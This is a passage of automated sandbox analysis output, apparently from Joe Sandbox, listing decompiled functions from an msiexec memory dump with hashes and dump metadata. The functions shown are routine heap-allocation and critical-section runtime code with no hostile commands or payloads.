                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D335A1(void* __eax, void* __ebx, void* __ecx) {
                              				void* _t6;
                              				void* _t10;
                              				void* _t11;
                              
                              				_t10 = __ecx;
                              				_t6 = __eax;
                              				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                              					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                              				}
                              				if( *((char*)(_t11 - 0x1a)) != 0) {
                              					return E04D1EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                              				}
                              				return _t6;
                              			}







                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                              • Instruction ID: 4f6f3df77533a1724898d739d13c275408e672378f70d681af51c18b74fce23b
                              • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                              • Instruction Fuzzy Hash: 4AD0C935A51184AAEB51AB50D31CB6877B2FB0031AF5820659C46069A2C3BAAA5AD601
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D1AAB0() {
                              				intOrPtr* _t4;
                              
                              				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                              				if(_t4 != 0) {
                              					if( *_t4 == 0) {
                              						goto L1;
                              					} else {
                              						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                              					}
                              				} else {
                              					L1:
                              					return 0x7ffe0030;
                              				}
                              			}





                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                              • Instruction ID: 4fda14d0b7d831af863b39313c4a748542b92f4de82c49e8fd84caf63db13aeb
                              • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                              • Instruction Fuzzy Hash: 6DD0E935352A80DFD716CF1DD954B1573A4BB45B44FC50490E945CBB65E62CF944CA00
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D8A537(intOrPtr _a4, intOrPtr _a8) {
                              
                              				return L04D28E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                              			}




                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                              • Instruction ID: eae730b1045353ae4d71ec3e5e5361e4842900710e0e1f42576e9235b1af8d3b
                              • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                              • Instruction Fuzzy Hash: 53C01232180248BBCB126E81CD00F067B2AEBA4B60F008010FA080A5608632E970EA94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D0DB40() {
                              				signed int* _t3;
                              				void* _t5;
                              
                              				_t3 = L04D24620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                              				if(_t3 == 0) {
                              					return 0;
                              				} else {
                              					 *_t3 =  *_t3 | 0x00000400;
                              					return _t3;
                              				}
                              			}






                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                              • Instruction ID: 7d542c2b970f4df0151ad43bf9960eeee4bc0f7cf06178c59d4ae08befd27078
                              • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                              • Instruction Fuzzy Hash: 4FC08C30380A00AAEB225F20CE01B4036A1BB20B0AF4400A0A700DA0F4DB78E901EA10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D0AD30(intOrPtr _a4) {
                              
                              				return L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                              			}




                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                              • Instruction ID: c9bd983abb89824d1ed5b3dc3ea7df7825324decc049c65b2f4e412b4f9e2615
                              • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                              • Instruction Fuzzy Hash: C6C08C32180248BBC7226A45CE00F017B29E7A0B60F000020F6040B6618932E860D598
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D336CC(void* __ecx) {
                              
                              				if(__ecx > 0x7fffffff) {
                              					return 0;
                              				} else {
                              					return L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                              				}
                              			}




                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                              • Instruction ID: c0e182e8a820bd129bfe928ab1a9fa70a870db40cc595c6b9accda6b8f207163
                              • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                              • Instruction Fuzzy Hash: BFC02B70250440FFE7155F30CF00F147254F700A27F680354B220494F0D528BC00DA00
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D176E2(void* __ecx) {
                              				void* _t5;
                              
                              				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                              					return L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                              				}
                              				return _t5;
                              			}





                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                              • Instruction ID: 1f46d07821fdaecb476c5275d7ad812d62a5e31b6ed85dc8b0c55ea5960ca2a6
                              • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                              • Instruction Fuzzy Hash: 2AC08C702411806AEB2A6B08CE30B203650BB2870CF48019CEE110A4B1C378B842C208
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D23A1C(intOrPtr _a4) {
                              				void* _t5;
                              
                              				return L04D24620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                              			}





                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                              • Instruction ID: 590ffbd53a641f904d2ace84fffef780f7a15aa668afa61b03ce74bdbf007662
                              • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                              • Instruction Fuzzy Hash: 81C08C32180248BBC712AF41DD00F017B29E7A0B60F000020FA040A5608532ED60D998
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D27D50() {
                              				intOrPtr* _t3;
                              
                              				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                              				if(_t3 != 0) {
                              					return  *_t3;
                              				} else {
                              					return _t3;
                              				}
                              			}





                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                              • Instruction ID: 5caba02d81828ff0bf7cdfeba37830d32a052595915d5f39981dd2fc9a7062a9
                              • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                              • Instruction Fuzzy Hash: 59B09234301940CFCF26DF28C180B1533E4BB44A44B8400D0E400CBA20D229E8008900
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D32ACB() {
                              				void* _t5;
                              
                              				return E04D1EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                              			}





                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                              • Instruction ID: 0f0c40db4b55e3cbdbeb1cc12a26cd2a6e81e82dfc2c9b6f3534935bc3064cca
                              • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                              • Instruction Fuzzy Hash: 78B01232D10450DFCF02EF40D710F197331FB00750F054490980127970C228BC01CB40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 53%
                              			E04D9FDDA(intOrPtr* __edx, intOrPtr _a4) {
                              				void* _t7;
                              				intOrPtr _t9;
                              				intOrPtr _t10;
                              				intOrPtr* _t12;
                              				intOrPtr* _t13;
                              				intOrPtr _t14;
                              				intOrPtr* _t15;
                              
                              				_t13 = __edx;
                              				_push(_a4);
                              				_t14 =  *[fs:0x18];
                              				_t15 = _t12;
                              				_t7 = E04D4CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                              				_push(_t13);
                              				E04D95720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                              				_t9 =  *_t15;
                              				if(_t9 == 0xffffffff) {
                              					_t10 = 0;
                              				} else {
                              					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                              				}
                              				_push(_t10);
                              				_push(_t15);
                              				_push( *((intOrPtr*)(_t15 + 0xc)));
                              				_push( *((intOrPtr*)(_t14 + 0x24)));
                              				return E04D95720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                              			}











                              APIs
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D9FDFA
                              Strings
                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04D9FE2B
                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04D9FE01
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                              • API String ID: 885266447-3903918235
                              • Opcode ID: 36081e09a024ea487337ea1a3efc5c5f00a86867ab1dc643ed392d382d9c9246
                              • Instruction ID: 9d00da377708bd8d7c16b087897eb991dc09193b4945032d391796791cbde19a
                              • Opcode Fuzzy Hash: 36081e09a024ea487337ea1a3efc5c5f00a86867ab1dc643ed392d382d9c9246
                              • Instruction Fuzzy Hash: 88F0F632340201BFEB211A45DC06F23BB9AEB44730F150324F628961D1EA62FD2097F4
                              Uniqueness

                              Uniqueness Score: -1.00%